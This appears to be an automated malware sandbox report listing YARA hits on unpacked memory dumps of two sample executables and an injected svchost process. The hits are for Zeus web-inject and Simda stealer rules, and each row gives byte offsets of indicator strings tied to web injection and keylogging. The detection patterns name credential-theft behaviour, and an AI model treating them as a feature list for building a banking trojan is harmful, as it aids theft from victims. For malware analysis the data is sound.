10.2.NcYLgtXIKJgHj.exe.14c2000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
28.2.NcYLgtXIKJgHj.exe.2eb0000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.25.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.63.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.49.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.71.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.14.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.2.svchost.exe.29f3c00.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0.2.Bpfz752pYZ.exe.407000.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.48.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.881000.4.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4b3f4:$a1: name=%s&port=%u 0x4abc8:$a2: data_inject 0x4ad7c:$a3: keylog.txt 0x4aa5d:$a4: User-agent: %s]]] 0x4b544:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.17.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
6.2.NcYLgtXIKJgHj.exe.16e2000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.16.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.66.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.59.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.58.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
28.2.NcYLgtXIKJgHj.exe.2d12000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.43.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
6.2.NcYLgtXIKJgHj.exe.16e2000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.8.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.7.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.37.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
20.2.NcYLgtXIKJgHj.exe.27d0000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0.2.Bpfz752pYZ.exe.400000.2.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
0.2.Bpfz752pYZ.exe.400000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4c7f4:$a1: name=%s&port=%u 0x4bfc8:$a2: data_inject 0x4c17c:$a3: keylog.txt 0x4be5d:$a4: User-agent: %s]]] 0x4c944:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.32.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.33.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.30.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.33.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.65.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.2.svchost.exe.29a2000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.65.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
31.2.NcYLgtXIKJgHj.exe.2792000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.57.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.55.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
36.2.NcYLgtXIKJgHj.exe.23a0000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.44.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.30.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0.2.Bpfz752pYZ.exe.406400.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x463f4:$a1: name=%s&port=%u 0x45bc8:$a2: data_inject 0x45d7c:$a3: keylog.txt 0x45a5d:$a4: User-agent: %s]]] 0x46544:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.42.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.59.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.2.svchost.exe.2cd1c00.4.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.2.svchost.exe.2c70000.5.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
22.2.NcYLgtXIKJgHj.exe.2340000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.38.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.72.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
36.2.NcYLgtXIKJgHj.exe.23a0000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.53.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.881000.4.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
2.3.svchost.exe.881000.4.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4c7f4:$a1: name=%s&port=%u 0x4bfc8:$a2: data_inject 0x4c17c:$a3: keylog.txt 0x4be5d:$a4: User-agent: %s]]] 0x4c944:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.23.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.39.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
34.2.NcYLgtXIKJgHj.exe.bd2000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.31.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.13.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
10.2.NcYLgtXIKJgHj.exe.14c2000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
14.2.NcYLgtXIKJgHj.exe.2922000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.19.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.18.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
31.2.NcYLgtXIKJgHj.exe.27f0000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.62.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.25.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
34.2.NcYLgtXIKJgHj.exe.bd2000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0.2.Bpfz752pYZ.exe.400000.2.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
0.2.Bpfz752pYZ.exe.400000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4dbf4:$a1: name=%s&port=%u 0x4d3c8:$a2: data_inject 0x4d57c:$a3: keylog.txt 0x4d25d:$a4: User-agent: %s]]] 0x4dd44:$a5: %s\%02d.bmp
2.3.svchost.exe.5450000.15.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
22.2.NcYLgtXIKJgHj.exe.5e2000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
28.2.NcYLgtXIKJgHj.exe.2d12000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
34.2.NcYLgtXIKJgHj.exe.2740000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.22.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.886000.5.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x477f4:$a1: name=%s&port=%u 0x46fc8:$a2: data_inject 0x4717c:$a3: keylog.txt 0x46e5d:$a4: User-agent: %s]]] 0x47944:$a5: %s\%02d.bmp
2.3.svchost.exe.881000.2.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
2.3.svchost.exe.881000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4c7f4:$a1: name=%s&port=%u 0x4bfc8:$a2: data_inject 0x4c17c:$a3: keylog.txt 0x4be5d:$a4: User-agent: %s]]] 0x4c944:$a5: %s\%02d.bmp
2.2.svchost.exe.407000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.17.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.45.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
20.2.NcYLgtXIKJgHj.exe.27d0000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4dbf4:$a1: name=%s&port=%u 0x4d3c8:$a2: data_inject 0x4d57c:$a3: keylog.txt 0x4d25d:$a4: User-agent: %s]]] 0x4dd44:$a5: %s\%02d.bmp
0.2.Bpfz752pYZ.exe.406400.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x477f4:$a1: name=%s&port=%u 0x46fc8:$a2: data_inject 0x4717c:$a3: keylog.txt 0x46e5d:$a4: User-agent: %s]]] 0x47944:$a5: %s\%02d.bmp
10.2.NcYLgtXIKJgHj.exe.1520000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
0.2.Bpfz752pYZ.exe.407000.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.27.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
